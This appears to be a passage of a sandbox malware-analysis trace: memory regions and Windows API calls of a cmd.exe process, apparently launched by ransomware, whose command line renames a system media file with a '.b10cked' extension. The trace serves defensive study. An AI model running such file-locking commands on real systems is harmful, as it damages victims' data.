region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 19831 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 19832 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 19833 start_va = 0x670000 end_va = 0x67ffff entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 19834 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 19835 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 19836 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 19837 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 19838 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 19839 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 19840 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 19841 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 19842 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 19843 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 19844 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 19845 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 19846 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 19847 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 19848 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 19849 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 19850 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 19851 start_va = 0x680000 end_va = 0x127ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 19852 start_va = 0x1280000 end_va = 0x13e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001280000" filename = "" Thread: id = 301 os_tid = 0x188 [0150.824] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efaec | out: lpSystemTimeAsFileTime=0x2efaec*(dwLowDateTime=0x93d4a3c0, dwHighDateTime=0x1d440a9)) [0150.824] GetCurrentProcessId () returned 0xcdc [0150.824] GetCurrentThreadId () returned 0x188 [0150.824] GetTickCount () returned 0x2ea10 [0150.824] QueryPerformanceCounter (in: lpPerformanceCount=0x2efae4 | out: lpPerformanceCount=0x2efae4*=20761361654) returned 1 [0150.825] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0150.825] __set_app_type (_Type=0x1) [0150.825] __p__fmode () returned 0x76b331f4 [0150.825] __p__commode () returned 0x76b331fc [0150.825] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0150.825] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0150.826] GetCurrentThreadId () returned 0x188 [0150.826] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x188) returned 0x38 [0150.826] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0150.826] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0150.826] SetThreadUILanguage (LangId=0x0) returned 0x409 [0150.826] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0150.827] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efa7c | out: phkResult=0x2efa7c*=0x0) returned 0x2 [0150.827] VirtualQuery (in: lpAddress=0x2efab3, lpBuffer=0x2efa4c, dwLength=0x1c | out: lpBuffer=0x2efa4c*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0150.827] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2efa4c, dwLength=0x1c | out: lpBuffer=0x2efa4c*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0150.827] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2efa4c, dwLength=0x1c | out: lpBuffer=0x2efa4c*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0150.827] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2efa4c, dwLength=0x1c | out: lpBuffer=0x2efa4c*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0150.827] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2efa4c, dwLength=0x1c | out: lpBuffer=0x2efa4c*(BaseAddress=0x2f0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xe0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0150.827] GetConsoleOutputCP () returned 0x1b5 [0150.827] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0150.827] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0150.827] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.827] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0150.827] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.827] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0150.828] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.828] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0150.828] _get_osfhandle (_FileHandle=0) returned 0x3 [0150.828] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0150.828] _get_osfhandle (_FileHandle=0) returned 0x3 [0150.828] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0150.828] GetEnvironmentStringsW () returned 0x3e0168* [0150.828] FreeEnvironmentStringsW (penv=0x3e0168) returned 1 [0150.829] GetEnvironmentStringsW () returned 0x3e0168* [0150.829] FreeEnvironmentStringsW (penv=0x3e0168) returned 1 [0150.829] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee9ec | out: phkResult=0x2ee9ec*=0x40) returned 0x0 [0150.829] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee9f4, lpData=0x2ee9f8, lpcbData=0x2ee9f0*=0x1000 | out: lpType=0x2ee9f4*=0x0, lpData=0x2ee9f8*=0x90, lpcbData=0x2ee9f0*=0x1000) returned 0x2 [0150.829] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee9f4, lpData=0x2ee9f8, lpcbData=0x2ee9f0*=0x1000 | out: lpType=0x2ee9f4*=0x4, lpData=0x2ee9f8*=0x1, lpcbData=0x2ee9f0*=0x4) returned 0x0 [0150.829] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee9f4, lpData=0x2ee9f8, lpcbData=0x2ee9f0*=0x1000 | out: lpType=0x2ee9f4*=0x0, lpData=0x2ee9f8*=0x1, lpcbData=0x2ee9f0*=0x1000) returned 0x2 [0150.829] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee9f4, lpData=0x2ee9f8, lpcbData=0x2ee9f0*=0x1000 | out: lpType=0x2ee9f4*=0x4, lpData=0x2ee9f8*=0x0, lpcbData=0x2ee9f0*=0x4) returned 0x0 [0150.829] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee9f4, lpData=0x2ee9f8, lpcbData=0x2ee9f0*=0x1000 | out: lpType=0x2ee9f4*=0x4, lpData=0x2ee9f8*=0x40, lpcbData=0x2ee9f0*=0x4) returned 0x0 [0150.829] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee9f4, lpData=0x2ee9f8, lpcbData=0x2ee9f0*=0x1000 | out: lpType=0x2ee9f4*=0x4, lpData=0x2ee9f8*=0x40, lpcbData=0x2ee9f0*=0x4) returned 0x0 [0150.829] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee9f4, lpData=0x2ee9f8, lpcbData=0x2ee9f0*=0x1000 | out: lpType=0x2ee9f4*=0x0, lpData=0x2ee9f8*=0x40, lpcbData=0x2ee9f0*=0x1000) returned 0x2 [0150.829] RegCloseKey (hKey=0x40) returned 0x0 [0150.829] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee9ec | out: phkResult=0x2ee9ec*=0x40) returned 0x0 [0150.829] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee9f4, lpData=0x2ee9f8, lpcbData=0x2ee9f0*=0x1000 | out: lpType=0x2ee9f4*=0x0, lpData=0x2ee9f8*=0x40, lpcbData=0x2ee9f0*=0x1000) returned 0x2 [0150.829] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee9f4, lpData=0x2ee9f8, lpcbData=0x2ee9f0*=0x1000 | out: lpType=0x2ee9f4*=0x4, lpData=0x2ee9f8*=0x1, lpcbData=0x2ee9f0*=0x4) returned 0x0 [0150.829] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee9f4, lpData=0x2ee9f8, lpcbData=0x2ee9f0*=0x1000 | out: lpType=0x2ee9f4*=0x0, lpData=0x2ee9f8*=0x1, lpcbData=0x2ee9f0*=0x1000) returned 0x2 [0150.829] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee9f4, lpData=0x2ee9f8, lpcbData=0x2ee9f0*=0x1000 | out: lpType=0x2ee9f4*=0x4, lpData=0x2ee9f8*=0x0, lpcbData=0x2ee9f0*=0x4) returned 0x0 [0150.829] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee9f4, lpData=0x2ee9f8, lpcbData=0x2ee9f0*=0x1000 | out: lpType=0x2ee9f4*=0x4, lpData=0x2ee9f8*=0x9, lpcbData=0x2ee9f0*=0x4) returned 0x0 [0150.829] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee9f4, lpData=0x2ee9f8, lpcbData=0x2ee9f0*=0x1000 | out: lpType=0x2ee9f4*=0x4, lpData=0x2ee9f8*=0x9, lpcbData=0x2ee9f0*=0x4) returned 0x0 [0150.829] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee9f4, lpData=0x2ee9f8, lpcbData=0x2ee9f0*=0x1000 | out: lpType=0x2ee9f4*=0x0, lpData=0x2ee9f8*=0x9, lpcbData=0x2ee9f0*=0x1000) returned 0x2 [0150.830] RegCloseKey (hKey=0x40) returned 0x0 [0150.830] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886379 [0150.830] srand (_Seed=0x5b886379) [0150.830] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL.b10cked\"" [0150.830] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Active.GRL.b10cked\"" [0150.830] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0150.830] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3e18c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0150.830] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0150.831] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0150.831] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0150.831] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0150.831] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0150.831] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0150.831] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0150.831] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0150.831] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0150.831] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0150.831] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0150.831] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0150.831] GetEnvironmentStringsW () returned 0x3e22b8* [0150.831] FreeEnvironmentStringsW (penv=0x3e22b8) returned 1 [0150.831] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0150.831] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0150.831] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0150.831] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0150.831] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0150.831] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0150.831] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0150.831] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0150.831] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0150.831] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0150.831] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef7b8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0150.832] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef7b8, lpFilePart=0x2ef7b4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef7b4*="Desktop") returned 0x18 [0150.832] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0150.832] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef534 | out: lpFindFileData=0x2ef534) returned 0x3dfff8 [0150.832] FindClose (in: hFindFile=0x3dfff8 | out: hFindFile=0x3dfff8) returned 1 [0150.832] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef534 | out: lpFindFileData=0x2ef534) returned 0x3dfff8 [0150.832] FindClose (in: hFindFile=0x3dfff8 | out: hFindFile=0x3dfff8) returned 1 [0150.832] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef534 | out: lpFindFileData=0x2ef534) returned 0x3dfff8 [0150.832] FindClose (in: hFindFile=0x3dfff8 | out: hFindFile=0x3dfff8) returned 1 [0150.833] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0150.833] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0150.833] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0150.833] GetEnvironmentStringsW () returned 0x3e2ad8* [0150.833] FreeEnvironmentStringsW (penv=0x3e2ad8) returned 1 [0150.833] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0150.833] GetConsoleOutputCP () returned 0x1b5 [0150.834] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0150.834] GetUserDefaultLCID () returned 0x409 [0150.834] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0150.834] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ef8f8, cchData=128 | out: lpLCData="0") returned 2 [0150.834] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ef8f8, cchData=128 | out: lpLCData="0") returned 2 [0150.834] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ef8f8, cchData=128 | out: lpLCData="1") returned 2 [0150.834] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0150.834] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0150.835] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0150.835] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0150.835] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0150.835] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0150.835] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0150.835] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0150.835] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0150.835] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0150.835] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0150.836] GetConsoleTitleW (in: lpConsoleTitle=0x3d08d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0150.836] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0150.836] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0150.836] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0150.836] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0150.837] _wcsicmp (_String1="move", _String2=")") returned 68 [0150.837] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0150.837] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0150.837] _wcsicmp (_String1="IF", _String2="move") returned -4 [0150.837] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0150.837] _wcsicmp (_String1="REM", _String2="move") returned 5 [0150.837] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0150.840] GetConsoleTitleW (in: lpConsoleTitle=0x2ef5f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0150.924] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0150.924] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0150.924] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0150.924] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0150.924] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0150.924] _wcsicmp (_String1="move", _String2="CD") returned 10 [0150.924] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0150.924] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0150.924] _wcsicmp (_String1="move", _String2="REN") returned -5 [0150.924] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0150.924] _wcsicmp (_String1="move", _String2="SET") returned -6 [0150.924] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0150.924] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0150.924] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0150.924] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0150.924] _wcsicmp (_String1="move", _String2="MD") returned 11 [0150.924] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0150.924] _wcsicmp (_String1="move", _String2="RD") returned -5 [0150.924] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0150.924] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0150.924] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0150.924] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0150.924] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0150.924] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0150.924] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0150.924] _wcsicmp (_String1="move", _String2="VER") returned -9 [0150.924] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0150.925] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0150.925] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0150.925] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0150.925] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0150.925] _wcsicmp (_String1="move", _String2="START") returned -6 [0150.925] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0150.925] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0150.925] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0150.927] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0150.927] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0150.927] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2ef3ac, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2ef3a4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2ef3a4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0150.927] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0150.927] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0150.927] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0150.927] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0150.927] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0150.927] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0150.927] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0150.927] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0150.927] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0150.927] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0150.928] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0150.929] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0150.929] _wcsicmp (_String1="Active.GRL", _String2=".") returned 51 [0150.929] _wcsicmp (_String1="Active.GRL", 